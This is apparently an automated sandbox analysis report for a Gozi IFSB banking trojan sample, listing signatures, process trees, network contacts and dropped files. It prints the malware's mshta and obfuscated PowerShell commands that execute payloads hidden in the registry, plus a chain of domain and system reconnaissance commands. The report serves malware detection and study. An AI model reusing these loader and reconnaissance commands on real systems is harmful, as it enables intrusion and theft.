Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-wgvqfseghj
Target de00c4750accf516704b8c0df265c24a
SHA256 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc

Threat Level: Known bad

The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Runs net.exe

Suspicious use of FindShellTrayWindow

Gathers system information

Suspicious behavior: MapViewOfSection

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 17:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 17:54

Reported

2022-08-03 17:56

Platform

win7-20220715-en

Max time kernel

44s

Max time network

48s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Network

N/A

Files

memory/1432-54-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp

memory/1532-55-0x0000000000000000-mapping.dmp

memory/1532-56-0x0000000076031000-0x0000000076033000-memory.dmp

memory/1532-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1532-62-0x0000000000490000-0x000000000049D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 17:54

Reported

2022-08-03 17:56

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 368 set thread context of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2228 set thread context of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 3608 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 3144 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 4356 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5068 wrote to memory of 3396 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 5068 wrote to memory of 3396 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 5068 wrote to memory of 3396 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1104 wrote to memory of 368 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 368 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 368 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 368 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4084 wrote to memory of 1064 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4084 wrote to memory of 1064 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 368 wrote to memory of 1228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 368 wrote to memory of 1228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1228 wrote to memory of 4548 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1228 wrote to memory of 4548 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 368 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 368 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 368 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 368 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2228 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 2028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2028 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2028 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2028 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2028 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2228 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4524 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4524 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4496 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4496 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4496 wrote to memory of 3512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4496 wrote to memory of 3512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2228 wrote to memory of 632 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 632 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 5076 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 5076 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2228 wrote to memory of 3564 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 3564 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 1960 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 1960 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1960 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1960 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2228 wrote to memory of 1968 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp" "c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp" "c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C84E.bin1 > C:\Users\Admin\AppData\Local\Temp\C84E.bin & del C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
RO 37.120.206.71:80 37.120.206.71 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
RO 37.120.206.91:80 37.120.206.91 tcp
IE 20.190.159.23:443 tcp
DE 185.212.47.98:8080 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
NL 13.69.109.131:443 tcp

Files

memory/3396-130-0x0000000000000000-mapping.dmp

memory/3396-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/3396-136-0x00000000024B0000-0x00000000024BD000-memory.dmp

memory/368-140-0x0000000000000000-mapping.dmp

memory/368-141-0x000002B7F1AE0000-0x000002B7F1B02000-memory.dmp

memory/368-142-0x00007FFFDE2C0000-0x00007FFFDED81000-memory.dmp

memory/4084-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline

MD5 6e643d9fe9f1aac860a49e946a8c1232
SHA1 c7d2d4618b3995fe915769ad5af4db5f16e20b49
SHA256 b576b3445b689a1f91fd59405021e742167b6d8b89b57e23f06c1191b2ebca4f
SHA512 0a620b6ea4ff2ea42849ce5faf70d0178acd87acad39fddfe5ea025374897ad72ab732e1b6e4cd01e7e70ce7d0cccdd32fb5d177a5659c356314ffa10b4936d1

\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

